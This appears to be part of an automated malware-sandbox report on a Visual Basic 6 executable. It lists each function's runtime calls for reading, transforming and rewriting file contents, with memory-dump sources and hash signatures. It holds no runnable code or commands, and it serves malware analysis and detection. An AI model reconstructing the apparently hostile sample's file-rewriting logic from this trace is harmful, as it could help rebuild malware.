#537.MSVBVM60(00000000,?,00000008,?), ref: 00413FAA
#606.MSVBVM60(00000002,00000008,?,00000008,?), ref: 00413FC9
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FD3
#537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00413FD8
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FE6
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00413FE9
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FF3
#537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00413FF8
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414006
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414009
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414013
#537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00414018
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414026
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414029
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414033
#537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00414038
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414046
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414049
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414053
#537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 00414058
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414066
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414069
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414073
#537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 00414078
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414086
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414089
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414093
#606.MSVBVM60(00000006,00000008,00000000,?,00000008,?), ref: 0041409F
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140A9
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140AC
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140B6
#581.MSVBVM60(&H68,00000000,?,00000008,?), ref: 004140BE
__vbaFpI4.MSVBVM60(?,00000008,?), ref: 004140C4
#537.MSVBVM60(00000000,?,00000008,?), ref: 004140CB
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140D9
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140DC
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140E6
#537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 004140EB
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140F9
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140FC
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414106
#606.MSVBVM60(00000002,00000008,00000000,?,00000008,?), ref: 00414112
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041411C
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041411F
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414129
#537.MSVBVM60(00000016,00000000,?,00000008,?), ref: 0041412E
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041413C
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041413F
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414149
#606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 00414155
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041415F
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414162
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041416C
#537.MSVBVM60(00000028,00000000,?,00000008,?), ref: 00414171
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041417F
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414182
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041418C
#606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 00414198
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141A2
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141A5
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141AF
#537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 004141B4
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141C2
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141C5
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141CF
#606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 004141DB
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141E5
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141E8
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141F2
#537.MSVBVM60(00000020,00000000,?,00000008,?), ref: 004141F7
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414205
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414208
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414212
#606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 0041421E
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414228
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041422B
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414235
#537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 0041423A
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414248
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041424B
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414255
#537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 0041425A
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414268
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041426B
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414275
#537.MSVBVM60(00000018,00000000,?,00000008,?), ref: 0041427A
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414288
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041428B
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414295
#606.MSVBVM60(00000005,00000008,00000000,?,00000008,?), ref: 004142A1
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142AB
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142AE
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142B8
#537.MSVBVM60(00000040,00000000,?,00000008,?), ref: 004142BD
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142CB
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142CE
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142D8
#537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 004142DD
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142EB
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142EE
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142F8
#606.MSVBVM60(00000012,00000008,00000000,?,00000008,?), ref: 00414304
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041430E
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414311
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041431B
__vbaStrCat.MSVBVM60(?,00000000,?,00000008,?), ref: 00414325
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041432F
__vbaFreeStrList.MSVBVM60(00000033,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414498
__vbaFreeVarList.MSVBVM60(00000009,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,?,00000008,?), ref: 004144DF
#648.MSVBVM60(0000000A), ref: 00414AEA
__vbaFreeVar.MSVBVM60 ref: 00414AFC
__vbaI2I4.MSVBVM60(?), ref: 00414B0E
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00414B18
__vbaI2I4.MSVBVM60 ref: 00414B20
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00414B2C
__vbaI2I4.MSVBVM60 ref: 00414B34
__vbaFileClose.MSVBVM60(00000000), ref: 00414B37
__vbaExitProc.MSVBVM60 ref: 00414B47
__vbaAryDestruct.MSVBVM60(00000000,?,00414D6B,?,00000000), ref: 00414D44
__vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D53
__vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D58
__vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D60
__vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D68
__vbaErrorOverflow.MSVBVM60(?,00000000), ref: 00414D8A

Strings

, xrefs: 004144F0
h#@, xrefs: 00412F42, 00412F97, 00413569, 004131A5
&HA8, xrefs: 004146CB
&H68, xrefs: 004140B9

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$Error$#537$BoundsGenerate$Free$#606CheckHresult$_adj_fdiv_m64$AnsiCopy$ListSystem$File$#581#648BstrCloseDestructExitOpenOverflowProcPut3RedimUnicode
String ID: $&H68$&HA8$h#@
API String ID: 3305104701-1988485601
Opcode ID: cd20a7d3b55ef82ee3132964682ea25cd73d0367465c479d272536d82207a749
Instruction ID: f198cd70f4d496bc7940f7355a5e4fe40ff025cce30350eb0c459dc764c5fff0
Opcode Fuzzy Hash: cd20a7d3b55ef82ee3132964682ea25cd73d0367465c479d272536d82207a749
Instruction Fuzzy Hash: A8130C71D002289BCB25DF65DD88BDEBBB9FB48301F1081EAE50AA6250DE745F85CF64

Function 00403A5C Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9b5fadcff6fc1b6333f2045a5fcfbe11ec3f7d18c2f0a438c4e6aacca40780
Instruction ID: 082b4fd57fed1769b9006e205b6e9b322f4e6cb11cfcb06b4efda431eea04361
Opcode Fuzzy Hash: 9c9b5fadcff6fc1b6333f2045a5fcfbe11ec3f7d18c2f0a438c4e6aacca40780
Instruction Fuzzy Hash: 85014FA644E3D24FC31387344CA49917FB0AD2311534A02DBC581CB1A3E208994AD762

Function 00415660 Relevance: 163.2, APIs: 92, Strings: 1, Instructions: 495COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(6D076537,00000000,00000000), ref: 004156CA
__vbaStrCopy.MSVBVM60 ref: 004156D2
__vbaOnError.MSVBVM60(00000001), ref: 004156D6
#648.MSVBVM60(0000000A), ref: 004156EE
__vbaFreeVar.MSVBVM60 ref: 004156FD
__vbaI2I4.MSVBVM60(?), ref: 0041570F
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
__vbaI2I4.MSVBVM60 ref: 00415721
#570.MSVBVM60(00000000), ref: 00415724
__vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
__vbaStrCopy.MSVBVM60 ref: 00415753

Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3

__vbaStrMove.MSVBVM60(?), ref: 00415769
__vbaFreeStr.MSVBVM60 ref: 0041576E
__vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
#525.MSVBVM60(00000000), ref: 00415789
__vbaStrMove.MSVBVM60 ref: 00415794
__vbaI2I4.MSVBVM60 ref: 00415799
__vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3

Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117

__vbaStrMove.MSVBVM60(?), ref: 004157B7
__vbaStrMove.MSVBVM60(00000003), ref: 004157C8
#616.MSVBVM60(00000000), ref: 004157CB
__vbaStrMove.MSVBVM60 ref: 004157D6
__vbaStrCmp.MSVBVM60(?,00000000), ref: 004157DD
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 004157FF
__vbaStrMove.MSVBVM60(?), ref: 00415824
__vbaStrMove.MSVBVM60(00000004,?), ref: 00415839
#618.MSVBVM60(00000000), ref: 0041583C
__vbaStrMove.MSVBVM60 ref: 00415847
__vbaStrCat.MSVBVM60(00000000), ref: 0041584A
__vbaStrMove.MSVBVM60(00000000), ref: 00415865
__vbaFreeStrList.MSVBVM60(00000004,?,?,00000000,00000000), ref: 00415879
__vbaI2I4.MSVBVM60 ref: 0041588E
__vbaGet4.MSVBVM60(00000004,?,-00000005,00000000), ref: 00415898
__vbaStrMove.MSVBVM60 ref: 00415855

Part of subcall function 0040EAB0: #594.MSVBVM60(?,6CF8D9F5,-00000001,6CF8D8B1), ref: 0040EB1A
Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92

__vbaStrCat.MSVBVM60(0000,?), ref: 004158D0
__vbaStrMove.MSVBVM60 ref: 004158DB
__vbaStrCat.MSVBVM60(0000,?), ref: 004158EC
__vbaStrMove.MSVBVM60 ref: 004158F7
__vbaStrMove.MSVBVM60(?), ref: 00415907
__vbaFreeStr.MSVBVM60 ref: 0041590C
__vbaI2I4.MSVBVM60 ref: 00415915
__vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041591A
#648.MSVBVM60(0000000A), ref: 00415932
__vbaFreeVar.MSVBVM60 ref: 00415941
__vbaI2I4.MSVBVM60(?), ref: 0041594D
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00415957
#525.MSVBVM60(00001000), ref: 00415962
__vbaStrMove.MSVBVM60 ref: 0041596D
__vbaI2I4.MSVBVM60 ref: 004159A3
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004159AC
__vbaI2I4.MSVBVM60 ref: 004159B4
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004159BD
#525.MSVBVM60(?), ref: 004159E9
__vbaStrMove.MSVBVM60 ref: 004159F4
__vbaI2I4.MSVBVM60 ref: 004159F9
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00415A02
__vbaI2I4.MSVBVM60 ref: 00415A0A
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415A13
#594.MSVBVM60(0000000A), ref: 00415A37
__vbaFreeVar.MSVBVM60 ref: 00415A40
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000FF,00000000), ref: 00415A5C
#593.MSVBVM60(0000000A), ref: 00415A86
__vbaGenerateBoundsError.MSVBVM60 ref: 00415AAF
__vbaGenerateBoundsError.MSVBVM60 ref: 00415ABD
__vbaFpUI1.MSVBVM60 ref: 00415ADF
__vbaFreeVar.MSVBVM60 ref: 00415AF7
__vbaSetSystemError.MSVBVM60 ref: 00415B1F
__vbaI2I4.MSVBVM60 ref: 00415B6D
__vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415B79

Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E

#593.MSVBVM60(0000000A), ref: 00415BB3
__vbaFpI4.MSVBVM60 ref: 00415BD5
__vbaFreeVar.MSVBVM60 ref: 00415BE0
__vbaSetSystemError.MSVBVM60 ref: 00415BF4
__vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00415C0C
__vbaI2I4.MSVBVM60 ref: 00415C17
__vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415C23
__vbaI2I4.MSVBVM60 ref: 00415C42
__vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00415C51
__vbaI2I4.MSVBVM60 ref: 00415C55
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415C5E
__vbaI2I4.MSVBVM60 ref: 00415C63
__vbaFileClose.MSVBVM60(00000000), ref: 00415C6C
__vbaI2I4.MSVBVM60 ref: 00415C70
__vbaFileClose.MSVBVM60(00000000), ref: 00415C73
__vbaExitProc.MSVBVM60 ref: 00415C7C
__vbaAryDestruct.MSVBVM60(00000000,?,00415D0C), ref: 00415CE6
__vbaFreeStr.MSVBVM60 ref: 00415CF5
__vbaFreeStr.MSVBVM60 ref: 00415CFA
__vbaFreeStr.MSVBVM60 ref: 00415CFF
__vbaFreeStr.MSVBVM60 ref: 00415D04
__vbaErrorOverflow.MSVBVM60 ref: 00415D28

Strings

0000, xrefs: 004158CB, 004158E7

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Free$Move$Error$File$#516#631BstrCopyPut3$#525$#593#594#648BoundsCloseGenerateGet3Get4ListOpenOwner3RedimSystem$#537#570#616#618DestructExitOverflowPreserveProcSeek
String ID: 0000
API String ID: 292954213-211534962
Opcode ID: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
Instruction ID: 53a986e52e39fbf970cbf615d3a1ec69ca294c6c8782ac2c6b5e72a9cd1184f1
Opcode Fuzzy Hash: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
Instruction Fuzzy Hash: C0122DB1E00248DFDB14DBE4DD89ADDBBB5FF88301F10412AE506A72A0DB745985CF59

Function 00411D10 Relevance: 143.9, APIs: 81, Strings: 1, Instructions: 403COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 00411D2E
__vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D5B
__vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 00411D6A
__vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411D80
__vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D8B

Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38

__vbaFreeStr.MSVBVM60(?,?,00000000,?,00000000,004025E6), ref: 00411D9D
__vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411DB3
__vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411DBE

Part of subcall function 00415660: __vbaStrCopy.MSVBVM60(6D076537,00000000,00000000), ref: 004156CA
Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 004156D2
Part of subcall function 00415660: __vbaOnError.MSVBVM60(00000001), ref: 004156D6
Part of subcall function 00415660: #648.MSVBVM60(0000000A), ref: 004156EE
Part of subcall function 00415660: __vbaFreeVar.MSVBVM60 ref: 004156FD
Part of subcall function 00415660: __vbaI2I4.MSVBVM60(?), ref: 0041570F
Part of subcall function 00415660: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415721
Part of subcall function 00415660: #570.MSVBVM60(00000000), ref: 00415724
Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 00415753
Part of subcall function 00415660: __vbaStrMove.MSVBVM60(?), ref: 00415769
Part of subcall function 00415660: __vbaFreeStr.MSVBVM60 ref: 0041576E
Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
Part of subcall function 00415660: #525.MSVBVM60(00000000), ref: 00415789
Part of subcall function 00415660: __vbaStrMove.MSVBVM60 ref: 00415794
Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415799
Part of subcall function 00415660: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3

__vbaFreeStr.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6), ref: 00411DDF
__vbaStrCat.MSVBVM60(00406C74,00000006,00000006,?,00000000,?,00000000,004025E6), ref: 00411E04
__vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E0F
#580.MSVBVM60(00000000,?,00000000,?,00000000,004025E6), ref: 00411E16
__vbaFreeStr.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E1F
#598.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E2C
__vbaNew2.MSVBVM60(004043C4,0041B024,0041B09C,?,00000000,?,00000000,004025E6), ref: 00411E5D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411E97
__vbaObjSet.MSVBVM60(?,?), ref: 00411EB8
__vbaFreeObjList.MSVBVM60(00000002,?,00000000,0041B09C,00000000,?,00000020), ref: 00411EDE
#598.MSVBVM60(?,00000000,004025E6), ref: 00411EEE
__vbaSetSystemError.MSVBVM60(?,00000000,004025E6), ref: 00411F10
__vbaStrCat.MSVBVM60(00406C74,?,00000000,?,00000000,004025E6), ref: 00411F2C
__vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 00411F37
__vbaFreeStr.MSVBVM60(00000000,?,00000000,004025E6), ref: 00411F46
#598.MSVBVM60(?,00000000,004025E6), ref: 00411F53
#648.MSVBVM60(0000000A), ref: 00411F72
__vbaFreeVar.MSVBVM60 ref: 00411F81
__vbaStrCat.MSVBVM60(00406C74,?), ref: 00411F97
__vbaFreeStr.MSVBVM60(004123A7), ref: 00412397
__vbaFreeStr.MSVBVM60 ref: 004123A0

Strings

5, xrefs: 00412346

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Free$Move$CopyError$#598$#580#648BstrChkstk$#525#529#570FileGet4ListNew2OpenSystem
String ID: 5
API String ID: 3012955283-2226203566
Opcode ID: 4c51faa2736fb7085ee1db596ec4db0ff330f662fb4349c4903174346d8d8e19
Instruction ID: b2978daf75234b14887ffa37483130b8305288e28cd3c1483e6757a63013c22d
Opcode Fuzzy Hash: 4c51faa2736fb7085ee1db596ec4db0ff330f662fb4349c4903174346d8d8e19
Instruction Fuzzy Hash: 9302E771900248EFDB04DFE0DE58BDEBBB5FB48305F108169E606B76A0DB781A85DB58

Function 0040F1D0 Relevance: 133.5, APIs: 66, Strings: 10, Instructions: 460COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,0040AA6C,0041B090), ref: 0040F1EE
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040F21E

Part of subcall function 0040FA50: __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
Part of subcall function 0040FA50: __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
Part of subcall function 0040FA50: #648.MSVBVM60(0000000A), ref: 0040FABD
Part of subcall function 0040FA50: __vbaFreeVar.MSVBVM60 ref: 0040FACA
Part of subcall function 0040FA50: __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
Part of subcall function 0040FA50: #570.MSVBVM60(?), ref: 0040FAFB
Part of subcall function 0040FA50: #525.MSVBVM60(00000000), ref: 0040FB02
Part of subcall function 0040FA50: __vbaStrMove.MSVBVM60 ref: 0040FB0D
Part of subcall function 0040FA50: __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
Part of subcall function 0040FA50: __vbaFileClose.MSVBVM60(?), ref: 0040FB37
Part of subcall function 0040FA50: __vbaStrCopy.MSVBVM60 ref: 0040FB4A
Part of subcall function 0040FA50: __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77

__vbaStrMove.MSVBVM60(0040AA6C,?,?,?,00000000,004025E6), ref: 0040F239

Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3

__vbaStrMove.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F24D
__vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F256
__vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F267
